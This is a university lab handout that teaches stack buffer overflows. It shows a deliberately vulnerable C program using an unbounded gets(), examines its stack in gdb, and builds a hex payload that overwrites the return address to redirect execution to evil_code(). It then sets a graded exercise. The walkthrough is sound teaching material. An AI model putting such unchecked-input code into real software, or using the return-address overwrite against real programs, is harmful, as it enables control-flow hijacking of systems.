Buffer Overflow Exploit

Here’s an example of exploiting a buffer overflow bug to cause a function to return to another function of our choosing.

Download and extract bufexploit.tar:

cd cs224
wget https://cs224.cs.vassar.edu/labs/bufexploit.tar
tar xvf bufexploit.tar
cd bufexploit

In this directory you’ll find several files:

To get started, let’s look at bufexploit.c:

#include <stdio.h>
#include <stdlib.h>

/* Compile with:
   gcc -Og -no-pie -fno-stack-protector -o bufexploit bufexploit.c
*/

char *gets(char *s){
  int c = getchar();
  char *p = s;
  while (c != EOF && c != '\n')
    {
      *p++ = c;
      c = getchar();
    }
  *p = '\0';
  return s;
}

void evil_code(void) {
  printf("You have been pwned!\n");
  exit(0);
}


void get_input(void) {
  char buf[20]; /* Way too small!!! */
  gets(buf);
  return;
}

void main(void) {
  printf("Type a string:\n");
  get_input();
  printf("Function returned normally\n");
}

Your job is to overflow the buffer in the call to get_input() to get this function to return to evil_code() instead of returning normally.

Let’s look at the disassembly of the get_input() function.

objdump -d bufexploit > bufexploit.s
000000000040063f <get_input>:
  40063f:   48 83 ec 28             sub    $0x28,%rsp
  400643:   48 89 e7                mov    %rsp,%rdi
  400646:   e8 8c ff ff ff          callq  4005d7 <gets>
  40064b:   48 83 c4 28             add    $0x28,%rsp
  40064f:   c3                      retq   

We know that at the start of the function call, %rsp points to the return address: the location in the calling function where execution resumes once get_input() returns.

The first line of the code, sub $0x28,%rsp allocates 40 bytes (0x28 is 40 in decimal) for the stack frame. Our stack frame looks like this now (each box holds 8 bytes in the diagram):

+------------------+
|  Return Address  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  |
+------------------+
|                  | <-- %rsp
+------------------+

The code then copies %rsp to %rdi before the call to gets(). The argument to gets() is the buffer where input from the user is stored, so we know that input from the user will be placed at the memory address contained in %rsp.

Let’s run the program under the debugger with a small input of hex numbers. To do this we’ll create a text file exploit.txt that looks like the following:

00 01 02 03 04 05 06 07  /* this is a comment */
11 11 11 11 11 11 11 11  /* 8 bytes per line  */
22 22 22 22 22 22 22 22	
33 33 33 33 33 33 33 33

I’ve given each byte a different value so we can easily see where each byte ends up on the stack.

To convert the text file above into a raw byte string suitable for input to the program, we use the hex2raw program as follows:

./hex2raw -i exploit.txt > out.raw

The file out.raw is what we’ll use to pass in our input string to the bufexploit program:

./bufexploit < out.raw
Type a string:
Function returned normally

The function returned normally. Why? We did overflow the buffer (the buffer is an array of 20 characters and we gave 33 characters, 32 input characters plus the NUL terminating character), but we didn’t overflow it enough to corrupt the return address stored on the stack. Let’s look at the program in gdb:

gdb -tui bufexploit

We are now inside gdb. Let’s set a breakpoint at get_input, run the program, and switch gdb to its assembly view.

(gdb) b get_input
Breakpoint 1 at 0x40063f
(gdb) run < out.raw
Starting program: /home/jawaterman/classes/cmpu-224/Code_Examples/Attacklab/bufexploit/bufexploit < out.raw
Type a string:
Breakpoint 1, 0x000000000040063f in get_input ()
(gdb) layout asm
(gdb)

Let’s move to the line right after the call to gets:

(gdb) ni
0x0000000000400643 in get_input ()
(gdb) ni
0x0000000000400646 in get_input ()
(gdb) ni
0x000000000040064b in get_input ()
(gdb)

Now let’s examine the stack using gdb’s examine memory (x) command. The format of the command is as follows:

(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
  t(binary), f(float), a(address), i(instruction), c(char), s(string)
  and z(hex, zero padded on the left).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).

The ADDRESS is the location in memory we want to examine. We will want to examine the address stored in %rsp (but remember in gdb registers are specified with the $ sign, so we’ll use $rsp).

To examine 48 bytes in hexadecimal, starting at the address in %rsp, we use the following:

(gdb) x/48bx $rsp
0x7fffffffe050: 0x00    0x01    0x02    0x03    0x04    0x05    0x06    0x07
0x7fffffffe058: 0x11    0x11    0x11    0x11    0x11    0x11    0x11    0x11
0x7fffffffe060: 0x22    0x22    0x22    0x22    0x22    0x22    0x22    0x22
0x7fffffffe068: 0x33    0x33    0x33    0x33    0x33    0x33    0x33    0x33
0x7fffffffe070: 0x00    0xe1    0xff    0xff    0xff    0x7f    0x00    0x00
0x7fffffffe078: 0x65    0x06    0x40    0x00    0x00    0x00    0x00    0x00

You can see where our input went on the stack. gdb prints memory with addresses increasing as we go down, so we have to read the output from the bottom up to see how it maps to our stack. It looks like the following:

+-------------------------+
| 00 00 00 00 00 40 06 65 |  <-- Return address
+-------------------------+
| 00 00 7f ff ff ff e1 00 |
+-------------------------+
| 33 33 33 33 33 33 33 33 |
+-------------------------+
| 22 22 22 22 22 22 22 22 |
+-------------------------+
| 11 11 11 11 11 11 11 11 |
+-------------------------+
| 07 06 05 04 03 02 01 00 |
+-------------------------+
   <--- Increasing Memory

Note that 0x400665 is the address for the regular function return. It is this address that we want to overwrite. From the stack diagram above it is clear that we need 8 more bytes of padding followed by the address of the start of the evil_code function. We can look at the bufexploit.s file we created earlier to find this address:

0000000000400625 <evil_code>:
  400625:   48 83 ec 08             sub    $0x8,%rsp
  400629:   48 8d 3d d4 00 00 00    lea    0xd4(%rip),%rdi        # 400704 <_IO_stdin_used+0x4>
  400630:   e8 8b fe ff ff          callq  4004c0 <puts@plt>
  400635:   bf 00 00 00 00          mov    $0x0,%edi
  40063a:   e8 a1 fe ff ff          callq  4004e0 <exit@plt>

From this we can see that evil_code starts at address 0x400625. Let’s update our exploit.txt file to overwrite the return address with the address of our evil function:

00 01 02 03 04 05 06 07  /* padding */
10 11 12 13 14 15 16 17  /* padding */
20 21 22 23 24 25 26 27  /* padding */
30 31 32 33 34 35 36 37  /* padding */
40 41 42 43 44 45 46 47  /* padding */
25 06 40 00 00 00 00 00  /* address of evil_code */

Note that the address is in little endian format: the least significant byte comes first, so the bytes 25 06 40 00 00 00 00 00 are read from right to left to give 0x0000000000400625.

Use hex2raw to create a new out.raw file and run your program:

./bufexploit < out.raw
Type a string:
You have been pwned!

This binary has now been successfully attacked.

Making Your Own Exploit

Now it’s your turn to give it a try. Using what you have learned so far as a guide, your job is to come up with an exploit for the my_exploit binary.

Write an exploit file that, when converted by hex2raw and given as input to my_exploit, causes the binary to return to the function your_code(), which prints out the message “Hey, how did we get here?”.

Submitting your work

Upload my_exploit.txt, the exploit file you used to hijack the my_exploit binary, to Gradescope.